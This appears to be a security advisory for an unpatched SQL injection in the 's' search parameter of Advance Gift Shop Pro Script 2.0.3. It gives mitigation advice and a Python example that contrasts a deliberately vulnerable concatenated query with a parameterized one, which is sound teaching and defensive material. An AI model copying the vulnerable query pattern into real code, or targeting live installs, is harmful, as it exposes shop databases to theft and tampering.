Vendor: Advance Gift Shop Pro Script
By: Mr Winst0n
CVSS: 9 (CRITICAL)
CWE: 89 (SQL Injection)
Product Name: Advance Gift Shop Pro Script
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Kali Linux, Windows 8.1
2019
Advance Gift Shop Pro Script 2.0.3 – SQL Injection
The Advance Gift Shop Pro Script version 2.0.3 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL code into the 's' parameter of the search functionality. This can lead to unauthorized access, data leakage, and potential manipulation of the database.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing any SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL Injection attacks.
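The mitigation above, as an added example that is not the product's own code: a search handler for an `s` term written once with string concatenation and once with validation plus a bound parameter. The page does not show the application's source, so Python with an in-memory SQLite database stands in, and the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample catalogue; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products (name) VALUES (?)",
                   [("Red Mug",), ("Gift Card 100% Off",), ("O'Neill Scarf",)])
    return db

def search_unsafe(db, s):
    # Vulnerable pattern: the 's' value is concatenated into the SQL text,
    # so a quote in the input changes the structure of the statement.
    sql = "SELECT name FROM products WHERE name LIKE '%" + s + "%' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def escape_like(s, esc="\\"):
    # Make LIKE wildcards in user input match literally.
    return s.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")

def search_safe(db, s, max_len=64):
    # Validate first: string type, bounded length, printable characters only.
    if not isinstance(s, str) or len(s) > max_len or not s.isprintable():
        raise ValueError("invalid search term")
    # Parameterized query: the value is bound and never parsed as SQL.
    sql = "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in db.execute(sql, ("%" + escape_like(s) + "%",))]

if __name__ == "__main__":
    db = make_db()
    print(search_safe(db, "O'Neill"))    # apostrophe handled as data
    try:
        search_unsafe(db, "O'Neill")     # same input breaks the concatenated query
    except sqlite3.OperationalError as exc:
        print("unsafe query failed:", exc)
```

A legitimate apostrophe that raises a SQL error in a search box is a cheap regression test for this class of bug: the concatenated version fails on it, the parameterized version returns the matching row.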